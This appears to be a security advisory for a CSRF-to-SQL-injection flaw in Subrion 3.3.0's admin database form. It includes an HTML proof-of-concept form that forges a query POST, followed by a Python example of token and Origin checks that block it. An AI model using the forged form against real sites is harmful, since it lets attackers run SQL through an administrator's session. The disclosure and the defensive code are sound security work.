Subrion version 3.3.0 suffers from a cross-site request forgery vulnerability that allows for arbitrary SQL injection.
13a087d5f2f67cb83cae17714e4c2ac16a5fac9e86d1e5c867d8eb4365e3950f
# Affected software: Subrion
# Type of vulnerability: CSRF to SQL injection
# URL: http://demo.subrion.org
# Discovered by: Provensec
# Website: http://www.provensec.com
# Version: v3.3.0
# Proof of concept
There is no CSRF protection on the admin database form, which makes Subrion vulnerable to SQL injection through a forged request.
Vulnerable parameter: query
PoC:
<html>
<body>
<form action="http://demo.subrion.org/admin/database/" method="POST">
<input type="hidden" name="query"
value="SELECT * FROM `sbr301_albums` `id` "
/>
<input type="hidden" name="table" value="sbr301_albums" />
<input type="hidden" name="field" value="id" />
<input type="hidden" name="exec_query" value="Go" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
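The root cause above is that the /admin/database/ handler accepts the POST as long as the admin is logged in, with nothing tying the request to a page the admin actually loaded. The following is an added defender-side example, not part of the original advisory and not Subrion's code: a stand-in handler that applies the synchronizer-token pattern (a per-session token echoed in a hidden field and compared in constant time) plus an Origin header check, then replays the advisory's forged POST and a legitimate one through it. The field name csrf_token, the attacker.example origin and the result dictionaries are constructed for the example.

```python
import hmac
import secrets
from typing import Optional

# Constructed stand-in for the admin database endpoint; not Subrion code.
ADMIN_ORIGIN = "http://demo.subrion.org"  # site the advisory's form posts to
TOKEN_FIELD = "csrf_token"                # hypothetical hidden-field name


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh, unguessable token to the server-side session and return it
    so the legitimate admin page can embed it as a hidden form field."""
    token = secrets.token_urlsafe(32)
    session[TOKEN_FIELD] = token
    return token


def csrf_check(session: dict, form: dict, origin: Optional[str]) -> Optional[str]:
    """Return None when the request passes CSRF validation, else the failure reason."""
    # Defence 1: when the browser sends Origin, it must name the admin site.
    # A form auto-submitted from another site carries that site's origin.
    if origin is not None and origin != ADMIN_ORIGIN:
        return f"origin mismatch: {origin}"
    submitted = form.get(TOKEN_FIELD)
    expected = session.get(TOKEN_FIELD)
    if not submitted or not expected:
        return "missing csrf token"
    # Defence 2: constant-time comparison against the session-bound token.
    if not hmac.compare_digest(submitted, expected):
        return "invalid csrf token"
    return None


def handle_database_post(session: dict, form: dict, origin: Optional[str]) -> dict:
    """Model of the admin query endpoint: only a request that passes the CSRF
    check reaches the 'execute' branch. Returns a record instead of running SQL."""
    reason = csrf_check(session, form, origin)
    if reason is not None:
        return {"status": "rejected", "reason": reason}
    if form.get("exec_query") != "Go":
        return {"status": "ignored", "reason": "exec_query not set"}
    return {"status": "executed", "query": form.get("query", "")}


def demo() -> dict:
    """Replay the advisory's forged POST and a legitimate one through the hardened handler."""
    session = {}  # the victim admin's logged-in session
    token = issue_csrf_token(session)

    # The advisory's PoC fields as a browser would submit them from a third-party
    # page: no token, and an Origin header naming that page's site (constructed).
    forged = {
        "query": "SELECT * FROM `sbr301_albums` `id` ",
        "table": "sbr301_albums",
        "field": "id",
        "exec_query": "Go",
    }
    forged_result = handle_database_post(session, forged, "http://attacker.example")

    # The same fields submitted from the real admin page, which carries the token.
    legit = dict(forged, **{TOKEN_FIELD: token})
    legit_result = handle_database_post(session, legit, ADMIN_ORIGIN)

    # A token issued to a different session must fail even with a matching Origin.
    other_session = {}
    borrowed = dict(forged, **{TOKEN_FIELD: issue_csrf_token(other_session)})
    mismatched_result = handle_database_post(session, borrowed, ADMIN_ORIGIN)

    return {"forged": forged_result, "legit": legit_result, "mismatched": mismatched_result}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The Origin check alone is not sufficient, since some browsers omit the header on same-site navigations and proxies may strip it, so the handler falls through to the token comparison whenever Origin is absent. Fixing CSRF does not make the query form safe to expose to low-privilege users; it only ensures the request genuinely came from the administrator's own page.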